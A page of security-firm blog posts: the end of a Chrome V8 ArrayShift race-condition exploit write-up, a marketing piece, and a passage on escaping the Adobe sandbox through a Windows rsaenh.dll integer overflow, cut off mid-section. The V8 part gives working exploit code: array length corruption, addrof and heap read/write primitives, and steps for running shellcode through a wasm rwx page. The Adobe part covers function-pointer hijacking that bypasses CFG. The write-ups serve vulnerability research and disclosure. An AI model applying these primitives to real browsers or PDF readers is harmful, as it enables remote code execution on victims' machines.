The above image shows how the elements of the barr array are altered throughout the exploit. We can see how, in the last state, barr‘s elements point to the in-memory JSObjects tmpfarr and tmpMarkerArray, which allows corrupting their lengths via statements like barr[2] = 0xffff. Bear in mind that the images are not comprehensive: JSObjects represented in memory contain fields, such as the Map pointer or the array length, that are not shown in the above image. Refer to the References section for details on the complete structures.

				
					let size_to_search = 0x8c;
let next_size_to_search = size_to_search+0x60;
let arr_search = [];
let tmparr = new Array(Math.floor(size_to_search)).fill(9.9);
let tmpMarkerArray =  new Array(next_size_to_search).fill({
  a: placeholder_obj, b: placeholder_obj, notamarker: 0x12341234, floatprop: 9.9
});
let tmpfarr= [...tmparr];
let new_corrupted_length = 0xffff;

for (let v21 = 0; v21 < 10000; v21++) {

[1]

  arr_search.push([...tmpMarkerArray]);
  arr_search.push([...tmpfarr]);

[2]

  if (barr[0] != PUSH_OBJ) {
    for (let i = 0; i < 100; i++) {

[3]

      if (barr[i] == size_to_search) {

[4]

        if (barr[i+12] != next_size_to_search) continue;

[5]

        barr[i] = new_corrupted_length;
        break;
      }
    }
    break;
  }
}

for (let i = 0; i < arr_search.length; i++) {

[6]

  if (arr_search[i]?.length == new_corrupted_length) {
    return [arr_search[i], {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337
    }];
  }
}
				
			

In the following, we describe how the above code alters barr‘s elements as shown in the previous figure.

  • Within a loop at [1], several arrays are pushed into another array with the intention of reclaiming the previously freed memory. These actions trigger garbage collection, so that when the memory is freed, the object is moved and overwritten by the desired arrays (tmpfarr and tmpMarkerArray).
  • The check at [2] observes that the array no longer contains any of the initial values pushed. This means that the vulnerability has been triggered correctly and barr now points to some other part of memory.
  • The intention of the check at [3] is to identify the array element that holds the length of the tmpfarr array.
  • The check at [4] verifies that the adjacent object has the length for tmpMarkerArray.
  • The length of the tmpfarr is then overwritten at [5] with a large value, so that it can be used to craft the exploit primitives.
  • Finally at [6], a search for the corrupted array object is performed by querying for the new corrupted length via the JavaScript length property. One thing to note is the optional chaining ?. operator; it is needed here because arr_search[i] might be an undefined value without the length property, breaking JavaScript execution (see the short example after this list). Once found, the corrupted array is returned.
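
The role of the optional chaining operator in that search loop can be illustrated with a minimal, self-contained snippet; the variable names below are illustrative and not taken from the exploit:

// Some slots of the searched array may hold undefined; a plain property access
// would throw and abort the search, while optional chaining simply yields undefined.
let spray_results = [[1.1, 2.2], undefined, [3.3]];
for (let i = 0; i < spray_results.length; i++) {
  if (spray_results[i]?.length == 2) {
    console.log(`candidate at index ${i}`);
  }
  // spray_results[i].length would throw a TypeError for i == 1.
}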

Creating and Locating the Marker Object

Once the length of an array has been corrupted, it allows reading and writing out-of-bounds within the V8 heap. Certain constraints apply, as reading too far could cause the exploit to fail. Therefore a cleaner way to read-write within the V8 heap and to implement exploit primitives such as addrof is needed.

				
					[1]

for (let i = size_to_search; i < new_corrupted_length/2; i++) {

[2]

  for (let spray = 0; spray < 50; spray++) {
    let local_findme = {
      a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337, findyou:0x12341234
    };
    objarr.push(local_findme);
    function gcing() {
      const v15 = new String("Hello, GC!");
    }
    gcing();
  }
  if (marker_idx != -1) break;

[3]

  if (f2string(cor_farr[i]).includes("22222222")){
    print(`Marker at ${i} => ${f2string(cor_farr[i])}`);
    let aux_ab = new ArrayBuffer(8);
    let aux_i32_arr = new Uint32Array(aux_ab); 
    let aux_f64_arr = new Float64Array(aux_ab);
    aux_f64_arr[0] = cor_farr[i];

[4]

    if (aux_i32_arr[0].toString(16) == "22222222") {
      aux_i32_arr[0] = 0x44444444;
    } else {
      aux_i32_arr[1] = 0x44444444;
    }
    cor_farr[i] = aux_f64_arr[0];

[5]

    for (let j = 0; j < objarr.length; j++) {
      if (objarr[j].findme != 0x11111111) {
        leak_obj = objarr[j];
        if (leak_obj.findme != 0x11111111) {
          print(`Found right marker at ${i}`);
          marker_idx = i;
          break;
        }
      }
    }
    break;
  }
}
				
			
  • A for loop [1] traverses the array with corrupted length, cor_farr. Note that this is one of the potential points of failure in the exploit: traversing too far into the corrupted array will likely result in a crash due to reading past the boundaries of the memory page. Thus, a value such as new_corrupted_length/2 was selected at the time of development, arrived at through several tests.
  • Before starting to traverse the corrupted array, a minimal memory spray is attempted at [2] in order to have the wanted local_findme object right in the memory pointed by cor_farr. Furthermore, garbage collection is triggered in order to trigger compaction of the newly sprayed objects with the intention of making them adjacent to cor_farr elements.
  • At [3] f2string converts the float value of cor_farr[i] to a string value (a sketch of such a helper is shown after this list). This is then checked against the value 22222222 because V8 represents small integers in memory by left-shifting the actual value by one, leaving the last bit set to 0. So 0x11111111 << 1 == 0x22222222, which is the memory value of the small integer property local_findme.findme. Once the marker value is found, several “array views” (Typed Arrays) are constructed in order to change the 0x22222222 part and not the rest of the float value. This is done by creating a 32-bit view aux_i32_arr and a 64-bit view aux_f64_arr on the same buffer aux_ab.
  • A check is performed at [4] to know whether the marker is found in the higher or the lower 32 bits. Once determined, the value is changed to 0x44444444 by using the auxiliary array views.
  • Finally at [5], the objarr array is traversed in order to find the changed marker and the index marker_idx is saved. This index and leak_obj are used to craft exploit primitives within the V8 heap.
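
The exploit relies on a small float-to-hex-string helper, f2string, whose definition is not shown above. The following is a minimal sketch of what such a helper might look like, reconstructed from how it is used; it is an assumption, not the original implementation:

// Hypothetical f2string: reinterprets a JavaScript float as its raw 64 bits and
// returns them as a hex string, so values read out of cor_farr can be matched
// against markers such as 0x22222222.
function f2string(f) {
  let buf = new ArrayBuffer(8);
  let f64 = new Float64Array(buf);
  let u32 = new Uint32Array(buf);
  f64[0] = f;
  return u32[1].toString(16).padStart(8, "0") +
         u32[0].toString(16).padStart(8, "0");
}

With this representation, the SMI tagging mentioned above is easy to verify: (0x11111111 << 1) === 0x22222222 holds, so a float whose raw bytes contain the tagged findme property will include the string 22222222.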

Exploit Primitives

The following sections are common to most V8 exploits and are easily accessible from other write-ups. We describe these exploit primitives mainly to explain how they deal with the fact that the spray might have left the objects unaligned in memory.

Address of an Object

				
					function v8h_addrof(obj) {

[1]

  leak_obj.a = obj;
  leak_obj.b = obj;

  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);

[2]

  aux_f64_arr[0] = cor_farr[marker_idx - 1];

[3]

  if (aux_i32_arr[0] != aux_i32_arr[1]) {
    aux_i32_arr[0] = aux_i32_arr[1]
  }  

  let res = BigInt(aux_i32_arr[0]);

  return res;
}
				
			

The above code presents the addrof primitive and consists of the following steps (a short usage sketch follows the list):

  • First, at [1], the target object to leak is placed within the properties a and b of leak_obj and auxiliary array views are created in order to read from the corrupted array cor_farr.
  • At [2], the properties are read from the corrupted array by subtracting one from the marker_idx. This is due to the leak_obj having the properties next to each other in memory; therefore a and b precede the findme property.
  • By checking the upper and lower 32-bits of the read float value at [3], it is possible to tell whether the a and b values are aligned. In case they are not, it means that only the higher 32-bits of the float value contains the address of the target object. By assigning it back to the index 0 of the aux_i32_arr, the function is simplified and it is possible to just return the leaked value by always reading from the same index.
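
As a short usage sketch (the object name below is illustrative), the primitive returns the tagged 32-bit V8-heap address of an object, as read from the property slot, in the form of a BigInt:

// Illustrative use of the addrof primitive defined above.
let victim = {marker: 0x1337};
let victim_addr = v8h_addrof(victim);            // BigInt holding the tagged address
console.log("victim @ 0x" + victim_addr.toString(16));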

Reading and Writing on the V8 Heap

Depending on the architecture and whether pointer compression is enabled (the default on 64-bit architectures), there are situations where it is necessary to read either just a 32-bit tagged pointer (e.g. an object) or a full 64-bit address. The latter case only applies to 64-bit architectures, where the backing store of a Typed Array must be manipulated in order to build arbitrary read and write primitives outside of the V8 heap boundaries.

Below we only present the 64-bit architecture read/write. Their 32-bit counterparts do the same, but with the restriction of reading the lower or higher 32-bit values of the leaked 64-bit float value.

				
					function v8h_read64(v8h_addr_as_bigint) {
  let ret_value = null;
  let restore_value = null;
  let aux_ab = new ArrayBuffer(8);
  let aux_i32_arr = new Uint32Array(aux_ab); 
  let aux_f64_arr = new Float64Array(aux_ab);
  let aux_bint_arr = new BigUint64Array(aux_ab);

[1]

  aux_f64_arr[0] = cor_farr[marker_idx];
  let high = aux_i32_arr[0] == 0x44444444;

[2]

  if (high) {
    restore_value = aux_f64_arr[0];
    aux_i32_arr[1] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx] = aux_f64_arr[0];
  } else {
    aux_f64_arr[0] = cor_farr[marker_idx+1];
    restore_value = aux_f64_arr[0];
    aux_i32_arr[0] = Number(v8h_addr_as_bigint-4n);
    cor_farr[marker_idx+1] = aux_f64_arr[0];
  }

[3]

  aux_f64_arr[0] = leak_obj.floatprop;
  ret_value = aux_bint_arr[0];
  cor_farr[high ? marker_idx : marker_idx+1] = restore_value;
  return ret_value;
}
				
			

The 64-bit architecture read consists of the following steps:

  • At [1], a check for alignment is done via the marker_idx: if the marker is found in the lower 32-bit value via aux_i32_arr[0], it means that the leak_obj.floatprop property is in the upper 32-bit (aux_i32_arr[1]).
  • Once alignment has been determined, next at [2] the address of the leak_obj.floatprop property is overwritten with the desired address provided by the argument v8h_addr_as_bigint. In addition, 4 bytes are subtracted from the target address because V8 will add 4 with the intention of skipping the map pointer to read the float value.
  • At [3], the leak_obj.floatprop points to the target address in the V8 heap. By reading it through the property, it is possible to obtain 64-bit values as floats and make the conversion with the auxiliary arrays.

This function can also be used to write 64-bit values by adding a value to write as an extra argument and, instead of reading the property, writing to it.

				
					function v8h_write64(what_as_bigint, v8h_addr_as_bigint) {

[TRUNCATED]

    aux_bint_arr[0] = what_as_bigint;
    leak_obj.floatprop = aux_f64_arr[0];

[TRUNCATED]
				
			

As mentioned at the beginning of this section, the only changes required to make these primitives work on 32-bit architectures are to use the provided auxiliary 32-bit array views such as aux_i32_arr and only write or read on the upper or lower 32-bit, as the following snippet shows:

				
					[TRUNCATED]

    aux_f64_arr[0] = leak_obj.floatprop;
    ret_value = aux_i32_arr[0];

[TRUNCATED]
				
			

Using the Exploit Primitives to Run Shellcode

The following steps to run custom shellcode on 64-bit architectures are public knowledge, but are summarized here for the sake of completeness; a sketch using the primitives above follows the list:

  1. Create a wasm module that exports a function (e.g. main).
  2. Create a wasm instance object WebAssembly.Instance.
  3. Obtain the address of the wasm instance using the addrof primitive.
  4. Read the 64-bit pointer within the V8 heap at the wasm instance address plus 0x68. This retrieves the pointer to a rwx page where we can write our shellcode.
  5. Now create a Typed Array of Uint8Array type.
  6. Obtain its address via the addrof function.
  7. Write the previously obtained pointer to the rwx page into the backing store of the Uint8Array, located 0x28 bytes from the Uint8Array address obtained in step 6.
  8. Write your desired shellcode into the Uint8Array one byte at a time. This will effectively write into the rwx page.
  9. Finally, call the main function exported in step 1.
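
The following is a minimal sketch of those steps using the primitives defined earlier. It assumes a wasm_instance object whose exported function is named main; the 0x68 and 0x28 offsets are the ones quoted in the steps above and may vary across V8 versions, and the shellcode bytes are placeholders:

// 1-2. wasm_instance is assumed to be an already created WebAssembly.Instance
//      that exports a function called main.
let wasm_addr = v8h_addrof(wasm_instance);

// 3-4. Read the pointer to the rwx page backing the compiled wasm code.
let rwx_page = v8h_read64(wasm_addr + 0x68n);

// 5-7. Point a Uint8Array's backing store at the rwx page.
let u8 = new Uint8Array(0x100);
let u8_addr = v8h_addrof(u8);
v8h_write64(rwx_page, u8_addr + 0x28n);

// 8. Copy the shellcode into the rwx page one byte at a time.
let shellcode = [0xcc, 0xc3];                    // placeholder bytes (int3; ret)
for (let i = 0; i < shellcode.length; i++) u8[i] = shellcode[i];

// 9. Calling the exported function runs the shellcode.
wasm_instance.exports.main();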

Conclusion

This vulnerability was made possible by a February 2021 commit that introduced direct heap reads for JSArrayRef, allowing the retrieval of a handle. Furthermore, this bug would have flown under the radar if not for another commit in 2018 that introduced measures to crash when double references are held during a shift operation on arrays. This vulnerability was patched in June 2021 by disabling left-trimming while concurrent compilation jobs are being executed.

The commits and their timeline show that it is not easy for developers to write secure code in a single go, especially in complex environments like JavaScript engines that also include fully-fledged optimizing compilers running concurrently.

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

References

Turbofan definition – https://web.archive.org/web/20210325140355/https://v8.dev/blog/turbofan-jit

Orinoco – GC – https://web.archive.org/web/20210421220936/https://v8.dev/blog/trash-talk

V8 Object representation – http://web.archive.org/web/20210203161224/https://www.jayconrod.com/posts/52/a-tour-of-v8–object-representation

EcmaScript – https://web.archive.org/web/20201126065600/http://www.ecma-international.org/ecma-262/5.1/ECMA-262.pdf

TypedArrays in JS – https://web.archive.org/web/20201115103318/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray

ArrayShift – https://web.archive.org/web/20210523042109/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/shift

ArrayPush – https://web.archive.org/web/20210523042046/https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/push

Elements Kind – https://web.archive.org/web/20210319122800/https://source.chromium.org/chromium/v8/v8.git/+/5db4a28ef75f893e85b7f505f5528cc39e9deef5:src/objects/elements-kind.h;l=31

https://web.archive.org/web/20210321104253/https://v8.dev/blog/elements-kinds

Fast properties – https://web.archive.org/web/20210326133458/https://v8.dev/blog/fast-properties

Pointer Compression in V8 – https://web.archive.org/web/20230512101949/https://v8.dev/blog/pointer-compression

About Exodus Intelligence

Our world class team of vulnerability researchers discover hundreds of exclusive Zero-Day vulnerabilities, providing our clients with proprietary knowledge before the adversaries find them. We also conduct N-Day research, where we select critical N-Day vulnerabilities and complete research to prove whether these vulnerabilities are truly exploitable in the wild.

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Google Chrome V8 ArrayShift Race Condition Remote Code Execution appeared first on Exodus Intelligence.

Why Choose Exodus Intelligence for Enhanced Vulnerability Management? 

16 May 2023 at 14:00

In the contemporary digital landscape, vulnerability management teams and analysts are overwhelmed by countless alerts, data streams, and patch recommendations. The sheer volume of information is daunting and frequently misleading. Ideally, the systems generating these alerts should streamline and prioritize the information. While AI systems and products are not yet mature enough to effectively filter out the noise, the solution still lies with humans—particularly, the experts who can accurately identify what’s critical and advise where to concentrate limited resources.  That’s where Exodus Intelligence comes in. Exodus focuses on investigating the vulnerabilities that matter, helping teams to reduce efforts on unnecessary alerting while focusing attention on critical and immediate areas of concern. 

 EXPERTISE IN (UN)EXPLOITABILITY 

 The threat landscape is diverse, ranging from payloads and malware to exploits and vulnerabilities. At Exodus, we target the root of the issue—the vulnerabilities. However, not just any vulnerability catches our attention. We dedicate our expertise to uncovering, analyzing, and documenting the most critical vulnerabilities within realistic, enterprise-level products that are genuinely exploitable. This emphasis on exploitability is intentional and pivotal. The intelligence we offer guides our customers towards becoming UN-EXPLOITABLE. 

 UNRIVALED TALENT POOL 

Exodus has fostered a culture over more than a decade that attracts and nurtures white hat hackers. We employ some of the world’s most advanced reverse engineers to conduct research for our customers, providing them with actionable intelligence and leading-edge insights to harden their network. Our relentless efforts are geared towards staying at the forefront of leading techniques and skills essential to outpace the world’s most advanced adversaries. Understanding and defending against a hacker necessitates a hacker’s mindset and skill set, which is precisely what we employ and offer. 

 RESPECTED INDUSTRY STANDING 

 Our team has won pwn2own competitions, authored books, and trained the most advanced teams worldwide. Our expertise and research have been relied upon by the United States and allied nations’ agencies for years, establishing a global reputation for us as one of the most advanced, mature, and reputable teams in this field. 

 PRECISE DETECTION 

 Exodus researchers dedicate weeks or even months to delve deep into the code to discover unknown vulnerabilities and analyze known (patched) vulnerability root causes. Our researchers develop an in-depth understanding of every vulnerability we report, often surpassing the knowledge of the developers themselves. The mitigation and detection guidance we provide ensures the accurate detection and mitigation of vulnerabilities, eliminating false positives. We don’t merely attempt to catch the exploit; we actually do. 

 EXCEPTIONAL VALUE 

 We have a dedicated team of over 30 researchers from across the globe, focusing solely on vulnerability research. In many companies, professionals and security engineers tasked with managing vulnerabilities and threats often have to deal with tasks outside their core competency. Now, imagine leveraging the expertise and output of 30 researchers dedicated to vulnerability research, all for the price of ONE cybersecurity engineer. Need we say more?… 

 Become the next forward-thinking business to join our esteemed customer list by filling out this form:

ABOUT EXODUS INTELLIGENCE 

Exodus Intelligence detects the undetectable.  Exodus discovers, analyzes and proves N-Day and Zero-Day vulnerabilities in our secure lab and provides our research to credentialed customers through our secure portal or API.  

Exodus’ Zero-Day Subscription provides customers with critically exploitable vulnerability reports, unknown to the public, affecting widely used and relied upon software, hardware, and embedded devices.   

Exodus’ N-Day Subscription provides customers with analysis of critically exploitable vulnerability reports, known to the public, affecting widely used and relied upon software, hardware, and embedded devices.   

Customers gain access to a proprietary library of N-Day and Zero-Day vulnerability reports in addition to proof of concepts and highly enriched vulnerability intelligence packages. These Vulnerability Intelligence packages, unavailable anywhere else, enable customers to reduce their mean time to detect and mitigate critically exploitable vulnerabilities.  Exodus enables customers to focus resources on establishing defenses against the most serious threats to your enterprise for less than the cost of a single cybersecurity engineer. 

For more information on our products and how we can help your vulnerability efforts, visit www.exodusintel.com or contact [email protected] for further discussion.

The post Why Choose Exodus Intelligence for Enhanced Vulnerability Management? appeared first on Exodus Intelligence.

Escaping Adobe Sandbox: Exploiting an Integer Overflow in Microsoft Windows Crypto Provider

6 April 2023 at 19:01

By Michele Campa

Overview

We describe a method to exploit a Windows N-day vulnerability to escape the Adobe sandbox. This vulnerability is assigned CVE-2021-31199 and is present in multiple Windows 10 versions. The vulnerability is an out-of-bounds write due to an integer overflow in a Microsoft Cryptographic Provider library, rsaenh.dll.

Microsoft Cryptographic Provider is a set of libraries that implement common cryptographic algorithms. It contains the following libraries:
 
  • dssenh.dll  – Algorithms to exchange keys using Diffie-Hellman or to sign/verify data using DSA.
  • rsaenh.dll  – Algorithms to work with RSA.
  • basecsp.dll – Algorithms to work with smart cards.

These providers are abstracted away by an API in the CryptSP.dll library, which acts as the interface that developers are expected to use. Each call to the API expects an HCRYPTPROV object as an argument. Depending on certain fields in this object, CryptSP.dll redirects the code flow to the right provider. We will describe the HCRYPTPROV object in more detail when describing the exploitation of the vulnerability.

Cryptographic Provider Dispatch

Adobe Sandbox Broker Communication

 
Both Adobe Acrobat and Acrobat Reader run in Protected Mode by default. The protected mode is a feature that allows opening and displaying PDF files in a restricted process, a sandbox. The restricted process cannot access resources directly. Restrictions are imposed upon actions such as accessing the file system and spawning processes. A sandbox makes achieving arbitrary code execution on a compromised system harder.
 
Adobe Acrobat and Acrobat Reader use two processes when running in Protected Mode:
 
  • The Broker process, which provides limited and safe access to the sandboxed code.
  • The Sandboxed process, which processes and displays PDF files.

When the sandbox needs to perform an action that it cannot execute directly, it emits a request to the broker through a well-defined IPC protocol. The broker services such requests only after ensuring that they satisfy a configured policy.
Sandbox and Broker

Sandbox Broker Communication Design

 
The communication between the broker and the sandbox happens via a shared memory region that acts like a message channel: it is used to inform the other side that a message is ready to be processed, or that a message has been processed and the response is ready to be read.
 
On startup the broker initializes a shared memory region of size 2MB and creates the event handles. Both the event handles and the shared memory are duplicated and written into the sandbox process via WriteProcessMemory().
 
When the sandbox needs to access a resource, it prepares the message in the shared memory and emits a signal to inform the broker. On the other side, once the broker receives the signal it starts processing the message and emits a signal to the sandbox when the message processing is complete.
Communication between Sandbox and Broker
The elements involved in the Sandbox-Broker communication are as follows:
 
  • Shared memory with RW permissions of size 2MB is created when the broker starts. It is mapped into the child process, i.e. the sandbox.
  • Signals and atomic instructions are used to synchronize access to the shared memory.
  • Multiple channels in the shared memory allow bi-directional communication by multiple threads simultaneously.

In summary, when the sandbox process cross-calls a broker-exposed resource, it locks the channel, serializes the request and pings the broker. Finally it waits for the broker and reads the result.
 

Vulnerability

The vulnerability occurs in the rsaenh.dll:ImportOpaqueBlob() function when a crafted opaque key blob is imported. This routine is reached from the Crypto Provider interface by calling CryptSP:CryptImportKey() that leads to a call to the CPImportKey() function, which is exposed by the Crypto Provider.
				
					// rsaenh.dll

__int64 __fastcall CPImportKey(
        __int64 hcryptprov,
        char *key_to_imp,
        unsigned int key_len,
        __int64 HCRYPT_KEY_PUB,
        unsigned int flags,
        _QWORD *HCRYPT_KEY_OUT)
{

[Truncated]

  v7 = key_len;
  v9 = hcryptprov;
  *(_QWORD *)v116 = hcryptprov;
  NewKey = 1359;

[Truncated]

  v12 = 0i64;
  if ( key_len
    && key_len = key_len )
  {
    if ( (unsigned int)VerifyStackAvailable() )
    {

[1]

      v13 = (unsigned int)(v7 + 8) + 15i64;
      if ( v13 = (unsigned int)v7 )
      {
        v39 = (char *)((__int64 (__fastcall *)(_QWORD))g_pfnAllocate)((unsigned int)(v7 + 8));
        v12 = v39;

[Truncated]

      }

[Truncated]

      goto LABEL_14;
    }

[Truncated]

LABEL_14:

[2]

  memcpy_0(v12, key_to_imp, v7);
  v15 = 1;
  v107 = 1;
  v9 = *(_QWORD *)v116;

[Truncated]

[3]

  v18 = NTLCheckList(v9, 0);
  v113 = (const void **)v18;

[Truncated]

[4]

  if ( v12[1] != 2 )
  {

[Truncated]

  }
  if ( v16 == 6 )
  {

[Truncated]

  }
  switch ( v16 )
  {
    case 1:

[Truncated]

    case 7:

[Truncated]

    case 8:

[Truncated]

    case 9:

[5]

      NewKey = ImportOpaqueBlob(v19, (uint8_t *)v12, v7, HCRYPT_KEY_OUT);
      if ( !NewKey )
        goto LABEL_30;
      v40 = WPP_GLOBAL_Control;
      if ( WPP_GLOBAL_Control == &WPP_GLOBAL_Control || (*((_BYTE *)WPP_GLOBAL_Control + 28) & 1) == 0 )
        goto LABEL_64;
      v41 = 210;
      goto LABEL_78;
    case 11:

[Truncated]

    case 12:

[Truncated]

    default:

[Truncated]

  }
}
				
			

Before reaching ImportOpaqueBlob() at [5], the key to import is allocated on the stack or on the heap, depending on the available stack space, at [1]. The key to import is then copied at [2] into the newly allocated memory. The HCRYPTPROV object pointer is decrypted at [3], and at [4] the version member of the key structure is checked to be equal to 2. Finally, a switch on the type field of the key to import leads to executing ImportOpaqueBlob() at [5] if and only if the type member is equal to OPAQUEKEYBLOB (0x9).

The OPAQUEKEYBLOB indicates that the key is a session key (as opposed to public/private keys).

				
					__int64 __fastcall ImportOpaqueBlob(__int64 a1, uint8_t *key_, unsigned int len_, unsigned __int64 *out_phkey)
{

[Truncated]

    *out_phkey = 0i64;
    v8 = 0xC0;

[6]

    if ( len_ = v18 )      // key + 0x10
        {
            if ( (_DWORD)v17 )
            {

[9]

                *((_QWORD *)v16 + 3) = v16 + 0xC8;
                memcpy_0(v16 + 0xC8, key_ + 0x70, v17);
            }

[Truncated]

    }
    else
    {

[Truncated]

    }
      if ( v16 )
        FreeNewKey(v16);
      return v10;
    }

[Truncated]

  return v10;
}
				
			

In order to reach the vulnerable code, the key to import must be longer than 0x70 bytes [6]. The vulnerability is an integer overflow at [7], caused by a lack of validation of the values at addresses (unsigned int)((uint8_t*)key + 0x14) and (unsigned int)((uint8_t*)key + 0x10). For example, if one of these members is set to 0xffffffff, an integer overflow occurs. The vulnerability is triggered when the memcpy() routine is called to copy (unsigned int)((uint8_t*)key + 0x10) bytes from key + 0x70 into v16 + 0xc8 at [9].

An example of an opaque blob that triggers the vulnerability is the following: if key + 0x10 is set to 0x120 and key + 0x14 equals 0xffffff00, then it leads to allocating 0x120 + 0xffffff00 + 0xc8 + 0x08 = 0xf0 bytes of buffer, into which 0x120 bytes are copied. The integer overflow allows bypassing a weak check, at [8], which requires the key length to be greater than: 0x120 + 0xffffff00 + 0x70 = 0x90.
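
The 32-bit wraparound behind these numbers can be reproduced with plain unsigned arithmetic; the short JavaScript snippet below (using >>> 0 to truncate to 32 bits) recomputes the allocation size and the minimum key length from the example above:

// Fields of the example opaque blob: *(uint32_t*)(key + 0x10) and *(uint32_t*)(key + 0x14).
const field_0x10 = 0x120;
const field_0x14 = 0xffffff00;

// Size passed to the allocator in ImportOpaqueBlob(): wraps around to 0xf0.
const alloc_size = (field_0x10 + field_0x14 + 0xc8 + 0x08) >>> 0;

// Minimum key length accepted by the weak length check: wraps around to 0x90.
const min_key_len = (field_0x10 + field_0x14 + 0x70) >>> 0;

console.log(alloc_size.toString(16), min_key_len.toString(16));   // "f0 90"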

Exploitation

The goal of exploiting this vulnerability is to escape the Adobe sandbox in order to execute arbitrary code on the system with the privileges of the broker process. It is assumed that code execution is already possible in the Adobe sandbox.

Exploit Strategy

The Adobe broker exposes cross-calls such as CryptImportKey() to the sandboxed process. The vulnerability can be triggered by importing a crafted key into the Crypto Provider Service, implemented in rsaenh.dll. The vulnerability yields an out-of-bounds write primitive in the broker, which can be easily used to corrupt function pointers. However, Adobe Reader enables a large number of security features including ASLR and Control Flow Guard (CFG), which effectively prevent ROP chains from being used directly to gain control of the execution flow.
 
The exploitation strategy described in this section involves bypassing CFG by abusing a certain design element of the Microsoft Crypto Provider. In particular, the interface that redirects code flow according to function pointers stored in the HCRYPTPROV object.
  

CryptSP – Context Object

HCRYPTPROV is the object instantiated and used by CryptSP.dll to dispatch calls to the right provider. It can be created via the CryptAcquireContext() API, which returns an initialized HCRYPTPROV object.

HCRYPTPROV is a basic C structure containing function pointers to the routines exposed by the provider. In this way, calling CryptSP.dll:CryptImportKey() executes HCRYPTPROV->FunctionPointer(), which corresponds to provider.dll:CPImportKey().

The HCRYPTPROV data structure is shown below:

				
					Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    ----------------------------------------------
0x00        8                 CPAcquireContext          Function pointer exposed by Crypto Provider
0x08        8                 CPReleaseContext          Function pointer exposed by Crypto Provider
0x10        8                 CPGenKey                  Function pointer exposed by Crypto Provider
0x18        8                 CPDeriveKey               Function pointer exposed by Crypto Provider
0x20        8                 CPDestroyKey              Function pointer exposed by Crypto Provider
0x28        8                 CPSetKeyParam             Function pointer exposed by Crypto Provider
0x30        8                 CPGetKeyParam             Function pointer exposed by Crypto Provider
0x38        8                 CPExportKey               Function pointer exposed by Crypto Provider
0x40        8                 CPImportKey               Function pointer exposed by Crypto Provider
0x48        8                 CPEncrypt                 Function pointer exposed by Crypto Provider
0x50        8                 CPDecrypt                 Function pointer exposed by Crypto Provider
0x58        8                 CPCreateHash              Function pointer exposed by Crypto Provider
0x60        8                 CPHashData                Function pointer exposed by Crypto Provider
0x68        8                 CPHashSessionKey          Function pointer exposed by Crypto Provider
0x70        8                 CPDestroyHash             Function pointer exposed by Crypto Provider
0x78        8                 CPSignHash                Function pointer exposed by Crypto Provider
0x80        8                 CPVerifySignature         Function pointer exposed by Crypto Provider
0x88        8                 CPGenRandom               Function pointer exposed by Crypto Provider
0x90        8                 CPGetUserKey              Function pointer exposed by Crypto Provider
0x98        8                 CPSetProvParam            Function pointer exposed by Crypto Provider
0xa0        8                 CPGetProvParam            Function pointer exposed by Crypto Provider
0xa8        8                 CPSetHashParam            Function pointer exposed by Crypto Provider
0xb0        8                 CPGetHashParam            Function pointer exposed by Crypto Provider
0xb8        8                 Unknown                   Unknown
0xc0        8                 CPDuplicateKey            Function pointer exposed by Crypto Provider
0xc8        8                 CPDuplicateHash           Function pointer exposed by Crypto Provider
0xd0        8                 Unknown                   Unknown
0xd8        8                 CryptoProviderHANDLE      Crypto Provider library base address
0xe0        8                 EncryptedCryptoProvObj    Crypto Provider object's encrypted pointer
0xe8        4                 Const Val                 Constant value set to 0x11111111
0xec        4                 Const Val                 Constant value set to 0x1
0xf0        4                 Const Val                 Constant value set to 0x1
				
			
CryptSP dispatch using HCRYPTPROV

When a CryptSP.dll API is invoked, the HCRYPTPROV object is used to dispatch the flow to the right provider routine. At offset 0xe0 the HCRYPTPROV object contains the real provider object that is used internally by the provider routines. When CryptSP.dll dispatches the call to the provider, it passes the real provider object contained at HCRYPTPROV + 0xe0 as the first argument.

				
					// CryptSP.dll

BOOL __stdcall CryptImportKey(
        HCRYPTPROV hProv,
        const BYTE *pbData,
        DWORD dwDataLen,
        HCRYPTKEY hPubKey,
        DWORD dwFlags,
        HCRYPTKEY *phKey)
{

[Truncated]

[1]

    if ( (*(__int64 (__fastcall **)(_QWORD, const BYTE *, _QWORD, __int64, DWORD, HCRYPTKEY *))(hProv + 0x40))(
           *(_QWORD *)(hProv + 0xE0),
           pbData,
           dwDataLen,
           v13,
           dwFlags,
           phKey) )
    {
        if ( (dwFlags & 8) == 0 )
        {
            v9[11] = *phKey;
            *phKey = (HCRYPTKEY)v9;
            v9[10] = hProv;
            *((_DWORD *)v9 + 24) = 572662306;
        }
        v8 = 1;
    }

[Truncated]

}
				
			

At [1], we see an example of how CryptSP.dll dispatches the call to the provider:CPImportKey() routine.

Crypto Provider Abuse

The Crypto Providers’ interface uses the HCRYPTPROV object to redirect the execution flow to the right Crypto Provider API. When the interface redirects the execution flow it sets the encrypted pointer located at HCRYPTPROV + 0xe0 as the first argument. Therefore, by overwriting the function pointer and the encrypted pointer, an attacker can redirect the execution flow while controlling the first argument.

Adobe Acrobat – CryptGenRandom abuse to identify corrupted objects

The Adobe Acrobat broker provides the CryptGenRandom() cross-call to the sandbox. If the CPGenRandom() function pointer has been overwritten with a function having a predictable return value different from the return value of the original CryptGenRandom() function, then it is possible to determine that a HCRYPTPROV object has been overwritten.

For example, if a pointer to the absolute value function, ntdll!abs, is used to override the CPGenRandom() function pointer, the broker executes abs(HCRYPTPROV + 0xe0) instead of CPGenRandom(). Therefore, by setting a known value at HCRYPTPROV + 0xe0, this cross-call can be abused by an attacker to identify whether the HCRYPTPROV object has been overwritten by checking if its return value is abs(<known value>).

Adobe Acrobat – CryptReleaseContext abuse to execute commands

